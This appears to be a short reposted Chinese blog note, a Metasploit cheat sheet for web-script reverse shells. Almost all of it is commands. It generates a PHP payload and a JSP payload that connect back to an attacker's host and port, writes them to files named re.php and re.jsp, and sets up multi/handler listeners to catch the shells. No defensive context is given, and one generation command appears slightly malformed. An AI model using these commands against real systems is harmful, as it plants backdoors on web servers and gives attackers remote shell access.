msf web脚本反弹shell

msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php

msf > use multi/handler

msf exploit(handler) > set PAYLOAD php/reverse_php

msf exploit(handler) > set LHOST x.x.x.x

msf exploit(handler) > set LPORT 2333

msf exploit(handler) > exploit


msf > payload java/jsp_shell_reverse_tcp LHOST=x.x.x.x R > re.jsp

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp

msf exploit(handler) > set LHOST 192.168.10.1

msf exploit(handler) > exploit

 

 

猜你喜欢

转载自www.cnblogs.com/nul1/p/9158100.html
msf